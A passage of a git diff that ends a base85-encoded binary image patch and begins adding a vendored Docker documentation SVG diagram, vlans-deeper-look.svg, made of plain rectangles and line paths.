zM>0}@T0<R~Nm+X#4yH=Vt0XXdFv{>Kkt=D9WqGvXb#v3Mbfejz@lacXV|`Z$z!IqJ
zCkt_ZV+Ftx%PR{o)epg-P1h)$!GpEUbW)GpvMRS$RMTA{0F%Ff>#QHIhQI-PBm^SF
z(c>bE+bOk7n`jm4u{LckJEnDCP04%twSgTITV4mMxK$IqD<lX)^~pOwd2`Cz3vn<!
zw1#ObyCyPf;<lH%G;!NR+HjrJhDFSdgT7U%>_%z5J3;_fC4Yt~`<sTn2O$m?wwl$Q
zEc@Cf8l}(?ZHF#Uc13bi>o{tno_9=|xPZQH?g-IACfLXBf|KJKa^}0eKR8(kv@M=U
zZHyo0@IxhGAYz@FRm6g93^Orkor%n=>_(YY&vlQygAfh-D0G)MoRqTmsmJIIuZ>}G
z&$DLGxyhqOWeLj0!I-?tSZKhB=}9^vd{;;&c=QA&h_ey0r%@Ie-EisZL`G#_MLG1W
zk$F#&K8%bJ!3bR%qE(KR!T6pK#?x=ylzrD8cVg&->;nWEB0eIR_>@qL2{h!!?+DgW
zSi;lrWIplG=dl&!6(J~qvDWEA9E>82e2fV3C?OR2jzAoYhOi+NBV}MMs_cloSA<9y
zYyE7ls2^YyReKo4*ufluAO|DFcU&Z`#{p(~fZZ3uKK_rp?c#BSJX#IeZ@})@z`Ngf
z4VL?d+l5FxirqZKdsT@1?vu~nIVEM?haG6gFgFjum?aqB7s5FE_6dBw!n}|J48IPx
z-;glbfFI}|enklJKmO`{xG3x7QP%l)ayS-p+z8?bxuXg14lzXT@5W;xFP=Y#%jD*Z
z`s-i>VB~+n2rTXkLE@L+K7-r*&DRj`xM75LFuH$)@6agrj)dHN{q>h{f4~b;*5yKo
zD$BCn2&NJQkK)#DkayG$Mcs#=nOQ>}d4Ld-v_MO$M)lNX{ML@-bucGHAfW;FTgY0o
z5pvY%;9z~&G_G3EN|!wtKWYadsH*ck`Uqx-kC?LNh1539b6>6Mj1yFq(T%})Mu<|P
z{`EUYHRLE|9W}JFd7d*l)hk43sBL6@G9yF<BK;g<<TXY84MJoGuyHV|MTqdajk*n)
z5fTI}`76|s`I-9T3CVjNlCbQw)!LJm40c0igalb7)=)=|B4k!by&@suQK4I7H$%Cp
zx)IF@$%McD4H!9kb8#+0q$ND$b)h?B$4a~L6`B!}W-<R4e0kEmkVi{dXk8d<{MxL$
zrtH;3+*oH`2&(@CQ}%OH7E+zjW~17=OtcvapLhMd5XKeUJ^t((LgmtEJ4%}t{mnFh
z5Hs;vAq|(`ybm!l^Y;5A){xpXO~X}RXFQm$Cv=h!f#T=xR`CZRz&k<678XkL{fa9S
z7v70N#Iq+bWj|Yp1(-LiWXp#$gj7$zdjH*{52*H++032&ez}l54=X`ZQ|CONhLWjM
zQkFpMIeeyjc7)WXszfMlZFo9~vLCvUoFK%1_5`LQXV(zxV1r3p6x-@1ui75X3nAp`
zSMZtc|8JC47hPA5acKjdO}y^hF?*U2_@0ELqCO)eE4!`;hO#qUO;nYo!T2O0zk32n
z>%37Gi3@<4s%<TeCmeU(<lz&9gik;G@SpQS&VT#;G$Gip+~*Xe+J3x7LLmq~O^ExJ
z!!wJzcOOO$uz4ZB`ssN>0On`_s~iji3={7}A&|3<guJCumWL@c3=6!SyHo0U7YI3u
zkYgG?z})ggA)lWw#KGu1Y+lIScELRtUn_(n?B=a_|GR65c>8q}?Vd-wb!0}!%sgZV
z+r0|jGtnNlTVP6n=AI!lLS||Rz6T?BVPp?;Yj#V7PZjd0H3W0nV^Rf~o04&s`54v_
zHButd0Amluc|zcMrgBDb7>wkS2;p(ykxFF(UIkT|fcPVF2MAyTh{yv>!laRTLotyF
zeuI$NQ5F(`AVlU29MCXe7+~Apgxd|+F^Ov8ydfCL9^)AyXO6O<J)njld1Wz=7KNdh
zuy(m29!6?uP^F8aM^s!bi=GclTNK@f%f-Yms3Bx%i(8&9m)6I)x+zBFA+-PwY{0@$
zQniJHwOvsZBOk6by&z>#c(svBx7`GX>7u6|jY|hei>38Q=$I%hfeGuXtIo&g*N_WO
z13DH$<K@EA;VQ4Y4XWBj0YZ>kELQxwNY?h2*F{rKTopQqi*YCyhCe()F#LUqs~3}6
zjwl3}6QXVPo*4?W2H)4q<i=82wq_`M4lwj^AsBiCFL`6-vPYy|EPCWo8HsWQylYSu
z7x}uo9m-Z$9~iz~*pR%1lr=9Tcwtd|mB?;HB8Z$2BGbZv3GoLI5?Oz3c{GJ?#ZB8@
z5+RtS5eWHW8m@X?rI8bY1(nNeD8}n<<f&ugv<o@xvG2RqaQxsJf~#O%Fy5L9wmD4F
zs{px`^&+Xte1Mpc#V9)=E#vXBzb>^UGeRE!tP=+(ymUfF5W)#pAOs_b<Cj9#)~jt*
z_B<+jSwyWB^z@>BTtn&tSIemaA;j$wgb|m^7D4p=tz$bO{@O+4zae4Wbc{Z{sAHbK
z6oPmKLR`<}2M~S1LCD&0SsGDx>#m`1H9}rn)IrE_W$JEZ8=is?Hj=6^aEt~wR<OED
z-kXMkr3+K3vUF+Yf})P<;uca?x*Qn;!pH@Smqin9Qx+4-r7ZDcyk1x#+j6<=>BDP?
zvp?=qmSAWAAr(`aJ@1D1v?@j>9aG%o!&S+KvRp2vHwZbJ7|suS9~dDXDlO*qqF7Z$
z&$H!*uR0Heph_=_BrY14>H`~>izRf=9c}pBl=ablAzT#;TeXI(#mH6XYN|nQ1BR}T
zfH`#RgKeP?BTMlmLQ+@Mp+@?xMQqvgxJ%)P>fHvIs$8YZA|LFi0k$H%?)+0z*5ghL
zNz5<_rSw86h-f^*8XPtPlS(zTl9;ImF;+E=l(&>HLC&oqKe{6Xvj*cZmOfCaXnX)d
zlMFzOA2!vN*@Q8`1i%=%WMYT`fJv+bj~n7Q0{(|WH3WLAU;_j&-5Im2X&g+91kVV0
z+*3&p6GOV2BjMdNcKeu;m+Poo5WJs0kq6AwH;0KK-odD&Y=Ou%x`!Q@TNpimV)(~{
zkS)NYcVN5TY+<l&3nN>Y>+S(YS@f2L{P0tT+*V)Ga9HQ_LfqN!?qusrX(X*r5dtS$
zD|9goskbZyzBVK$mu@zSBX!Cs3ob`^io;7`45Be(^FrWq1VJu^RZ;qug}|km2_nS9
z4~-5=(GcY-n~xBev;H0s5<VP;DXQvPofIKIfA`CkPl%84gJJ*W?TT632EyoC(qNE4
z+|cRpZx9>>fw;k1R0td%A}*5!9TEjHxNzhG#gHk4F7+NdB$EZ13&ja^DP#;8x|Kqq
z(Em`s%Tbk(_}V+{XCnkgJX=rC_wIC`E@px&4?zNMP@#nCjVNTpJkiL!<~T*A+aXZo
zTDQ4383P$7Aae-<Mbe+V4k9ZwCyEf6c?_NSIs_gW&o3^7FEr;u;ZG!SIm9lWdbuA&
zR)MUgnNtwdM8BI&CY3K)#knT9)M&OohX7bW{kHOjAc~k%wBZ&6io85O*sg>>nKA}R
zGRJ5y&`bMQJD<)1$w-qVYjp@bvU@vJ#1q2>NE;;^vC>XK;F0s~vmi3)0rejf<nOZR
zo>62LN+#(>R&cVij^XA*hZv8HL|%HM%_YMOKwh~8fk!^_ybUBvsMb!0K$ZU1B!sM$
zQDVZc>I7MB6)s?kqZ^bEQ$Hk$xxK~7KL~;j`)NL4-eeSHG02vtEL-rDrg!Cl29Y6Y
z3$>=f#cmZtp3^u4?1T%1U#B4Gj=cX$2O)H{HjTTaOB!|iO0V`yHi$z|m>8K`K~`Jz
z*?DAlUa7k9MXfX!Cj8Qef^2rNw^QU=2a#3xWDRo(g3I~)9akp-WWwk{8s-)x{GNJ;
z7jO4I+;V?ZNQgt3P`5*{EaAboo5KLI`=rerg4hRPq|?tKWLhXihAoSz-!ve1?0w83
zSfgn4S`c3-gc9?uizOYyPLW?<ZV-QjGRF$_Ut6U>R<el6ry6xgVevdow`SZsYgw`;
zV$CYr5cuO!hammVbx8tHN)|;_?71C+^m}|*2a)9qvbes6Ag+Za)Bf}@?3cBuSubW&
zcgh07mtM6V+0~8AeIXl0QE7iMb~^+fIX{(62pNka7QH%lHR{;(`n^dWKqe!Q(I2zv
z+ESLa$XE?x@91mdDARkRvD+a~<Va)#$^t;Cx;#2MSlWhQ2Z~H}vLN%K!$A?FaXZ_Y
zu6!zK2RqO>%vnhGE%bam8jqg29fD^y={AZpZ?Ys83q78iY;EfS?M|BRfGh@G_UC1g
zb??mX*$>Uef=cyUd9hOwi>+zg%0lFk<O2tmQveR+0OKPE$94oXASaiwF)y#lmpsta
zl((@J7$2>><uLY#VCE1|#eN-O7df^8^T*U!nr}xy0K`Be1)#JvIT?sK2t^2Dps|$#
zPzwZwpbUber_POh44i4m!5K4RDF9Qaf-;CQjd$T<0*UNW3PCciEp3=Uc3CYYptThe
zAB0+2kT$ULlc}+kfvJcsZ8Ta+iVa9KWG7PsvN<Gh9bkqD<d!AurUWEt0OJEk4ngD*
zZZHiD%z*x><b!?yb63#XIFf}=3u(M~`=~~-wm}!O=dB2YVXmG_NI_lAN*I;}8K#!S
z&0f?<2;;dljR7}?Wfwev31HFmxfc-!1dJAwxiq>Mu#GP<7-%*>V85yq+h!)3?l=)M
zUnEu4drySu%X^<nPE=<z!AI$jPVNvAT{|2&_dd&ai}hHILxFQ8AD_L;QnV0alEYz|
zMBYa~{s&ZwkYCMu>c*jvXBTIP!X7I)kV8>bcx*y|Ul$=j9or{J6B^l<jk3ypKTzSb
z8e%fW8fwjY1=vlKm<?o&8ml0I{h&QlRd!3g?Y$G)KtR9CbLV}T_5eZ*TcBqAsEic^
zBd!2HH&Z8O1=2AyiMpujNERFNW&<m!Vt5-=F{N7(hXW#r=vRS)w*i$-h~`~=06KSh
zf;;AtS3fm=v8WsM-h4h^JGj#7Hy(}g1O|-IS4T8xjr!UtSS7z;9-=<R{ZB{}%C{!a
zxRrt`tSlZ^lbDTiQx0!9O{_3N*2n-6MhIg`d~2x`5mJ81(z{l_-*^9_>3}BoBh?N1
zt9^qm(qrJcEB#<XYISZU38i49CKCls&8}15hFnV%j{o;eXjUsCq<E%oE_fJi&JuoI
znawt)x!E9D%-LoZkJ&J)B;y%D&>KFEHc=9ulg(xWDiAsoK|E$eo}pH_IQTB>@C?yk
ze9&ac!W?g<W1bi2K^v2k)u7{E1bYTg*8@yD+(3H>A<OA>Lf5vD^?Dgt@O%Ew=Kj>_
zO>74y+j#Hz!c+H`KF#cV5Td?V%ZixE7NgmS^KdhwG~BWUQijH6nvbY8W>vycdX1ph
zqq9^x{>eEVpNXKHjnHqIUz#Dnqi0Ber3HcRSysQ>agi-SfShq(23J;p)s+TM7~J6K
zr7IfkU=0Bwm%GV(+OyX*40&evc*y6wFxzpybGR_oI80V%uicPZg@hE()JY=_&xzFR
z)QY1K-IDa=JU)qrxbDeVW(b19u_=Q_JUUOU^9DZ|BB?e*nlETh(lNBZ;3b&lm#nr6
zyj%rVNB7+BAn0EN?u95#fxFV&7lQ!|RtE;J?TWMs^uq~x5>iSn>tk*0Pi=lVv3gS{
z$-;Fq-__>trqg)7<DtFdmw%_r=@(?kZ;A*JqLK0+SVCK))Y>LFgNA?*mgcNlk%Wj~
zHj9R%go2QqE$Ei9Fkd7maWsSX7bB$G?_$EO1(r8JJsJ$IK7fe<c5I&1mkSR*D9Y7K
z9rlM1Qs?io%%^jds4%panLB}A*xa&~(@BC1q4ST)<<w4kH*{wk{Jtd%sIV5Q5tJm2
zQWU4eN|Q7m?hz83AcQ6S+^n!SX)B~$60&7)1R)4S6{AvU4u7*X@DL5@2LnhpQbG}O
zu}{cFx6|>25Bp;fvYgt}HQj|LYoFf|;(X-udAOS-bH4{g;eWM_`x8=CbO^mhZDNg>
zUW1TE68^w8`37B<stjSsAM=KSA_4*V^Enulge;IH$dpA4ixo90K)G*}D<)(Gk0ivi
zRLN3=w2$1*K)>n=U-00Pr8H#cB%uRhc6>QOVRGm)%qH}mElQSux#K+$qDs~Q8X{_z
zHI7qgcNm)NhL3a3&s#K3>6ma3LboDC2!`?4ibph$sdX&~X`~3Updn!%^6SPIY6wsc
zA)05k2ikX1wN*j{uG^NPz7i!1e*J^nx2)CSgcx;BIj3P}gcQ;}-`!Aj4BngeEZ-3>
ze`kRZKDXBvME$<Ez4H2z#xNeoEt9ocgqW|<->^n2j`JaDZQ1L%ML?ZdZNY)G5TW^X
zqjd(6Z;j(TV&aSl8dB0s9Z*Xi6+i8j%~3nhG_Boj<AS&4Q1{Ts{jM+s(h#(}o(JE-
zggkLFK-4L}mpNI@$a?<7&hS#Q%&{Hc$Neq_1_t%aN1#zSQ-7~S{ihEXA=S(@86k}Z
zfwrUDAVgTiqZ2VEB8-S3g9Q!|i?lISkg)8nj!?!&xW$A3nywo7)jUvibqxdTfH0_C
z`aeU6S`_Rqh{>N_gRdrG7`F!ljv6*KP=*?s&k!Or<hW&$PbEt>WbXkZ`r@c2-+M7|
z0HTow*;ft~rx-T3Z%cWWr5}|EP5YD~PygoF1y@o6Ew<aXt~Tt-tafQDg56Vui0hJ9
zh{_P`Dp6Ed(xMt*&xl=`RH))aH8}3kG<)^m(*s0Zw#5NI7r^KXOCJBb^o1pxk`UnO
zbMdD3@=!M>ua29N5a8**Mogqg8ITpQ_4ax5aWzDqeeq4nORplYL5Ny<RsOL~Npy&%
zS5egkA@WE2{Xa%xNy$bDFbTB&PtDWj>2IGsriREA`R@A?7bn)*U!R^HfBQT2&7NOQ
zga(uVsXNZA<I`icY@Xo%kMVXGot1!SxXr(6;wKY}CO)EuV0-rLZKv%8-;{u(?>+Cu
z*T<*LW3?V8zFG6qcP6EzNZoOkul{h_#5Gd?j)c|QzkT~vIrtxKcWA>f5JLeJnVsZP
zOP20v3$s9FDd3lQh3*iAhX&sQ9U;SYfmTtXD1mMK;E_+hb<CdncX3x_KAc|tdqPMq
zb$Ud(-`rijk+g<c|BUkL;SOY`mGA&~iQo=Zn4Ep!o)XE`pa|h#P_4YhUUR2i2+U#2
zG%mdrvavuzptL4JhY9&<3FeVl0W=88zD8_gV3=3hmzE{vAW4`OC;lPx6DO-f8)2xH
zn6}P_hPBn24>?zm0wD|oPu>RF>-_(tOV={cR5ofFR&WGK(>9ql*aQ&^`|7krmK=~9
zzE}Jwn4&B+(lrB(`22bx$yqI=jt&87kcSmd$Y@N~mjiHg$=)uz!j18PPf7EDL4FL7
z?;xH-^6|!i#LM30#2`6+Bk}KmKteEw_@^w|CFKYJI6)D9UYZlwJYy%K&XXIijOzhz
zuDcdc;6^~GvPZ7S(JpCprWz~1X=$!4u+*?BR&Lk@+3pI8i2Ceg9#Je(dpy<P@c`Ej
z`t3ux)xEZjwfURXUa6b|8K#_<fXvcPIE_;kC&-sUv7nvNIFOX7t!R-cbfl{_gA*2-
z1VoH^*C7)DLN{fWy2XYPhIvE0Zyhq11BAV4p_TA!X)z413BGFs`3Lqnl0U)@ux~WZ
z(Rt4E^*iU$<D>I<O5*Fr0pSgU$CQj7b=DA`CwxMVTf)W?DjC8|lQ}gEBg4AWiz7I(
zlTiF5g9%7tG_eAHxUtN{Pb`THIf)#`vOpP@DW3pZ6!VbGV={3Bx3Mzet|Nuv48utH
z>o6x7dyNFsWU2^M(!qFa4!F$RI8R4F81K5n#3W(33H$Gc0l@`T)6@VFgfUA5jFD05
zBa8^65s)0M^&&c_MTlb*!Hl=+Qw|Y8T~bxO8{)A%C}L+;h>ek?#p3(tA)v#H>5k<^
zn2fC8W>uk>AfPxDx0rtMb%c1-PFr0B6UPghW%U`8nPU9AUq?SFsel4+o$*Kvki>As
zT$dwkJ|A#wJ^>F}cPvX)hjulh7{{KNF?Nk~F{VroHOt>IB3=Z77u64xO^Yf6jFPnw
zYhH*8)ldWiKH_YEApi+9XvoN6?AYjr#X;^_ZYv}=3kY3&x<4<OzL>FH4kOmKv@W#;
zgVBQP%0xUg!xx*`2pg^~QvwYxJnizt6$rk2Isn>`T^ZSmfMr<`=u#)bjL68Y&11us
zPr8WbIeOo7+vP4bfJea({^G6Qbg`_+*kF1X+3uVbB98u4orgP*i~5$E)BTKVa~Z|O
zxb4npVcjlwF~mymyED2Ej%08I5Nx>w<D_+xy-g9Q$N=7EWkn*}hp%i|t{?}D2(rz~
ziW@&nOqW3i2#~ngkq)qIy98%!TM%!VeiQDrC|v?%m#2>H>{&csFatY;%teBubvcMj
z42_vI<isKK!!1gI<8FSpxqI_~=#lu(=C@z&Nz!w^S(dUxBYnJN4jQ_3K$o&lyF}bJ
zuTmv5qDzvbyEBr08r;b~9W=E8#S1;Z$>O7LE$RBu-RtNZ?Y+}r$<l^s#<KKht%hZp
z70Loq8)gdS0Ssuna>-g7d_0!-y6dW@Mqf&xM{>GqUQ)t|^Qw1138Cr7nBt<`c&eqU
zs^vqzn3rGdZ)JBw)Y2YP;JGzR>xCcJ^dWOIpd6j+-Rog`l+{k%lBB<dxN?Y|3`BbL
ztesX>zwsaHRa(;nOpJM5>qO^kx&{z@%+d3;;QbF;HfWwmQjb5f!b4r^WwdO^Z|G9D
zotCuhcN7=0roL;Gy5c=+&5AH`(%=}N>p@cod7hx=Ys)$~$__6obGP5`-#j3aPn**1
zZL@yg402|$><MW-d+>2>b;<NM%|S$9dZv^$qq}Rn#XaxDtmlJ5wi_CdA#~Fm?&qUl
zE%#T;e{wn0gR{48>8c?4ZQZZ+ga?<uTJpzJ9|A&*!_Jmwg-+RD?5%Y8_XkVmYS+-W
zn$<o$PUoK$t@1?wmU6hQtsRI4hnjkd@<e>{ZYxvn8B04_rMdS%zYZ_75CN}Fc_cQM
zgSO=VuE{f2^ilUIYUzWb#<kw%Tjk;FO4IrPo<TUE_+6#6ZydjRy}`d%qx*e~9MIMO
z?USmc`_1YGCA4;`ytC|Om~<t#Hu(ExGhb<#(UIiWvccwQ+ENa)1Bw^T;K`of=!)}0
z?*J2g<dNENu5X-de5Lve5F-3nDJZ^ltSHyN9*}>!NrphOrgy||^s6Hazo4yjHXFQO
zQ`J*{Q>B!H3<=~$Hu`7=KQ4I}nq;M({4fv^B^)j7Lz2_<!H?Sq;)~(i4e|Z1T=svp
zj+gW9^5Dnq58Hk5JRf3?NA10Ovycv)^nTj=`hzHnjjS1dujlux!Q6`Yse7T)uU-e3
zG|LA$wYo(x1VqG6<>EB_YH#Ow+1sJtocQJbOplT{AlSKTSMw!3Ob=ev4#e|xi0NF`
zvmoeJ^y8hkJ^Z5l7YGPGJB?_wb5VYCygYmxiOrgIKnQX`*8*LDa9r(ULQ6Y*PSYP7
zr4{k}A0F!u3tC$0aKH7$bk@_<?7@$}N)g5jR`}v*(CCZzhaRLP{`*6i%3`@H9X#0x
z@0Qpe`9N0(juqzmxBjt!B%Nu7q~vYMFQ2-(waT37-csc>Al;Pi-5Lrtiy%JUL*}y4
z*;?N@^zPrgkXG71bd8KmNYfjLn0}=P;$fG5Om_z2$yUJ%f8TZPblYXWwFe8>YV7j@
z;qkf^wF-N|-@49W^}jx}(zE%&F9+vUx40~vd=S(9brrAcAtH`CcyVF|6v1A`8|7CI
zcJN(2XfN0D{DPiISC(#5LKv@^e%0tXOTDHSyeM_WhDz}lTHjswf-^n3tG#*4gG<cw
z^!J^Rp6{%m_=V;9Zdf>!*TFn)sLmbB==mQtw^)rZX{Ni%R{ij)U-IOdc~AEnor^t>
zO0Q7*w0?XnJ$AIy5TQlWf1(AAZfkkyK^XCG8+g5^?K-8$PgbJu%MnKHmu*P4I77aB
zf8#v_FY1ycJw^+fBn`th5IrN^Z%g}SNm>bODu+06S&GDl6tzl{WCh!LN2)a6Nmq?7
zMFrKTJX+Kun$z~Rt+X$e2awYR?O3Z6)$pzwZd&{1Rp}Y#(TwDIQWbsbE$Q7EwcLA@
z4nL}LIbY5<(|#*mY3oC+#}N+Cck;T<9=>&L1)h_mJZ+Y|@?|@n*HkC1Y<EJ$cyG$R
zD5t*EF3-J4ymh*7b}6oTh_;q1>t<ekTr>BrXONm4EyG^)X(dz2moFPz*g471s}aJt
z)R($f=ta$PK7Gj%yzoP1QPTAupOYlB`$?DYz{2FIW`0<JRhex7^@<~?AbI5;?2r3;
z_b184s9^1?{cZ21UUe>`@6$d;j<#QVlhH1J-nu`$zj4#AERtcrQE(WyQ*|C=Cshxz
z;$qu%QYitu3SssX_7~!el5(k0Tva%bmhFg;jLqJ(9h)P>o>hn~7>Zz|d}Lqw*s)PY
z;XvGW(g6mkdcCgjG_$&@$i_uQ$k@bCcxN`n!wvLs`;p?Zw|3*=%56gryv(i&)Rqy-
ztX2dH{K&BR_G$<|6CT*HUBTrMLlqIjju1y&q4c;|&y@QY_4qhLzygt7>^!RQvW#%%
zQANfa8S7#Ofh|NGT(C)FdsQKhLNX}@R-(NcQ5Zl?Kpznfrd+QG*eF(P*-6QWL+#l*
zm|V5pjLQQ&!bU*CuFJCQI_}L+>X=dtxZ%cL*;tF=gX12;$$K>cF#>mrp~J*6MIaTA
zvKAT`W>j(@VFba9&CELigpFxa3Wg|+1yI6AFvj#^n>cpIw3+b{CNzcx4URR)gqMgS
zjwcEH*Z^+nfk@kCB;r^yu@LK{v9XC89Mj1x(8MSuD1nY)hz(;H7^~rtV+2U}M4dqc
z5jG8;Ppp9L__}#<ae8i@)U6ni&|?mXd()v<W?XDYcqEn~BWfbTbTFBel&0k<!j1c5
zNiGS)^>S6BFg*zaF}|+DW|f2~IK$>KHr#8H2~d8j$>@>2sinm8hz60QGx_7jT8T@<
zWKd#xN+ul+k+>uUIycOa>13x@GBQFt;>bK1OT`b|2$Ud@u>#4+EEvLcehKG~hU2sX
zaUiGGSQppbM0wi$p+ChofsPOnfW8(rcG8p)y{2q1pi`15OlhV;t_3)8FakJ<0K(VZ
zu;~&c$RxwZ=>-l5EC(VP0Z2oD4=fG^-pvC-SPmv%9V~}&l9d=}Rv?IT)tL41ND5)Q
zf?^ep#}@%*=?vo-+kFm;h2s$6Nor5NY?$F#4hC`aWrTUu?(<B7<^syBfw*|fdKQaw
zAjFzDU&eYQ28u}n4u%pZpj=GhnlIv!Xk0WYdii`cg_%MOfnESO%<LwmALC^p#;|GJ
zAOkiEV8;HKX*QqsRTzV2M%Y2#zM{($H!yWCpv^{JSnhM|)L-*_jF+mu_#ht=)UGOv
zUfRnCnA|)d$f&0T3cER%aqCK^uAq#o)H6k(ZQgKs$4x0lJ)%lVrkOf4r4A6QG6s-}
zFMtk#olikdown<>YKV)BM>2|AXElX-UBI%fzz(P&?7DWH+{zAk0^+=^q=csanP&hp
zwqk25VJ4N55wcg~mj{7`#R1cXttgNQFl1u}PO!nIOE?60!dB_6{Pnj*7h!oUN*`FV
z(=dGshA_^g>h!@bwqugQrtFf|a<^y`%qC5pi#oq3^%;{8&aegK3gDDDDdMon8O6FS
z6JnGsp*&!27?YsF4?VHHcG;3%5eUy+DSL@qrR<J)q=y7Au2t5bZrw|t`uL{*#*imQ
zqhoz;mpl69jNXwfT@MNxyGsxM+Kc|B=g*jyl-dgBboH%rqNY#XLo>LgmYFZQ^spgy
z%)yt|8@*D57t@ZE$9F&`LU>V<q*LEX>yk$gB`L4zdY_(1x^z&^N<PMmmu+z4IlARm
zJLSuquJ@$Vdbz6h$fmAZa3-zpL?8x2eMgs8LWHYU$?^-5CFNg#5Kk^CX&zeEj$AhD
z4Zs*VTGcvuqDfvT&Z$)VraV};I%d!;cdXkN{dFr?2LaHRwlJ+pniV|JEWMjK^wQm#
z>@a6l^#GBk7KrKj@`^SndMF2GD|415J;%g(X9f+ca~j=ESFPuWv`SV8N9C5Z0b!(@
z9Wc#~x&f5q2tNBE#SV~*PoL2n2LvzZQFB<zhhL=kH;nlqEghV_jc)b$2bX8P=t<9?
zyA-##URJcAHGDK{&q(t9p`-Whz2^u5@|Q-JHjdBr%Box3*xttv@{ZJ3fCoj(hhIns
z&8=AgzAf2@*%V~fp(VU~`?DD!js;{TTCniR!*gqJk^c9UNc0BIJ^O(!qzClnvEDE0
z2N>#E^y5zb-3LU7aj#xX56)m6^7EH19fG=Uh0S!ZG^EQ9U%U=#p3<<|dO$cjrxMiK
z>b@R`KW*H%`1WvJg|*X$c6qmGMF=vaFE*b4zCzAA6%F2zoqX`gN<9M36Fm^iCF|<K
zhk(pn(#`To(0cuxJ$yYlWQkg8-cshx2+>>F;I~fLlr}g*nkU_M_PN-w%3f(45Iuqn
z+MqZ6cj`ROSyX&c>x(bub_U|T1M%qD*`LYGkj`A5?L=Sg_&<O9V)NeYl^Tg+Yd)Vo
z6(Ar|FRu<b7LeLNtR2&u)>Dd)f0-4}m+gedN-{rcU8mvc7XRC+xSh?HccMd8{Jpo%
zYFiMHLN{D|jZZ$DOJ247^>-Wuq<IXPB&z`wBVbS+AgWcwZ+25BKII6S%U8|d?6Y`2
zES6_`Fz=bqqPRJLfP5W@zrgdG_wsEkVkO27)DOPyzZS%^+smFv#Rc8;ztK8*wZGmA
zG1odCh>gd8n-yQI1Vv5lLqH(g-uMVT(ft>%S96*g6yKnqzZG-kLnxIz2b*^wAi%5C
z%)D2P5c+aYl@4%I`i@d@ea$Lod$iOmtYs$|5{U)#8NKNq!s^LzSUr3b7S#O%dJjqv
z&(2<jb1QW2@@^+uJdNgVi%0jaSca6|J@pH^e1FB+3tC5mBt!ZTki~B6WGD4_`whCE
zm-U!O7o`LEW`1A>n-=$*MYm05X~>_b;-^mT>3}DA@$=$t9FT9%J->Os^yg4a4`$40
z5i+DtYbD)pl`5FN-o?2cMe{L_&(;Rb@}Te;fBbATo(^zajcIDZ(ux7KG02cSS}3)3
z5T$dLklD1Ny@z56G9+BA&JJ#MWUWsh+=Hw_Tx%HuvhjP5oOdce2_H?RI>-%L+ACHh
z`_R&sw~V8=7kTdI@5IgJ^24SUXGn*Z15vBgRJ`bgh|osXWOdoMwqlpe<KwdFH#D)4
z1Y|9>AO*H&-h2<?;yvV*Q|?%o|J}v&U2*&1KX=2K75u;x)4F~d-M<ZASzAHQQdchY
zm9*rqOO+W*l@!e5`G=(gaem9uJ*|J?IqIpDNB4o}BPhw6pnNXrx)q)1=nGAky7-+Z
z{;t_tvWFCR!=g%#ETyVz-qCKz$}ViL@pGDIxtpqY3StF|?I9MdGHRxG%F@;1CHmN-
zzXFdZ&627@MNoRQ|F7cffs^+1;S&}+nqzJUVh+CZgJ!8?9X#mblYCKqV+9N9C?MO_
zrXKGhstRS5omtD%2Z+Np*mv%ocxwNmL)f#pwXW;g0p;n1^av6$&D>ZUgz$7-dKKcP
z4z6_RQWOh&TMZR`DX9>Ug|$@iDGU#8^b_tn1SEciwr!sMVni|m64=KOpv$O?Eepx0
zz++hvsI15WZ@2;@P<#%F6|e)^29tLMf?URfO+AnWjAU1kc|j%^cpR2NMkcb$6Ov(W
z44GtH0RRBOtYPLLwvLV1499FDLynL7g6)pLH5)^YjWFmS3GfIw%P20#MA;!h23H6%
zn8;ujfGacW&|`B>U}wfZM`1w7n4oH~IRGQZ25_ARDQ6D?0yMZmBR8<lY=D42c0rF2
z2Nr`JO=1>rBoO!;>>&k9p~*R9^rlY`hu8=1$p;28iH8sYDPUmM!e{(rC5pL;cFYDn
z*1#TNMU)XE6R}7l8vEnO*iB-MFcHGV;$&im<Hx3BZ#WSoblwc6(7^)m5t)i6Zj)Q$
znIw)U0*H)Zvu4cXMyhC}!n9fqHSa~3XKtoi)Bno?vuo5#<{7g{0)c_#u_Ar{k7UT7
zv|~Cs_)c!z^gd-??@S1|rm|Dj5ijFHcdYOSvs2Zn#DuzTX3D(=hsX-%rv9&+x~}zy
zV!`#X>v;dDI<-lNT@UeyG1X$%)cCYFo!pe9``VxW|5_GAWXZHCAqhIxjC$9KOUX4J
zOgdv?8k7+^k{byTOh$uap^4ei-*{;1o12J_`BOc(rXmPW&?L&&VNVzAI?Sm-)=p?{
z!u&tAvx!PvmAGytZl;!!YvOa-Pe_8OBIW*9EbMrTEGUr5^Hzux(A1|L7zLUFaV};$
zmMr*l2n?v@nKjw3*P<O51?%mnMCYlo5E&sXhT+=rc{;QMqae>-+n5Cc@D^DJU}z~t
zJ1`0?4FT-iAr1f_2td)o#{F+>V$PyTF}xS4e~d(w-H&0(j3&$tSqIk<ak?Q-(Gmnf
z1VIo%5JZq~iZI5`&d9(F?+voB(-yF>k0iiCo-SqvCT7M#14aQe6999SUnert*{%Qp
N002ovPDHLkV1f$s#LfT!

literal 0
HcmV?d00001

diff --git a/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.svg b/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.svg
new file mode 100644
index 0000000000..96cd21d52f
--- /dev/null
+++ b/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.svg
@@ -0,0 +1 @@
+<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="586" height="601"><style xmlns="http://www.w3.org/1999/xhtml"></style><defs/><g transform="translate(0,0)"><g><rect fill="#FFFFFF" stroke="none" x="0" y="0" width="586" height="601"/></g><g transform="matrix(1,0,0,1,295,192.98406475670114)"><g transform="translate(0,0)"><g transform="translate(-39,-89.9329528808594) translate(-256,-103.05111187584174) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#666666" d="M 300 323.5 L 300 197.98406475670114" stroke-miterlimit="10" stroke-width="3"/></g></g></g></g><g transform="matrix(1,0,0,1,295,192.98406475670114)"><g transform="translate(0,0)"><g transform="translate(-39,-89.9329528808594) translate(-256,-103.05111187584174) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#999999" d="M 300 323.5 L 300 197.98406475670114" stroke-miterlimit="10" stroke-width="3"/></g></g></g></g><g transform="matrix(1,0,0,1,252,201.98406475670117)"><g transform="translate(0,0)"><g transform="translate(4,-98.9329528808594) translate(-256,-103.05111187584177) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#666666" d="M 257 332.5 L 257 206.98406475670117" stroke-miterlimit="10" stroke-width="3"/></g></g></g></g><g 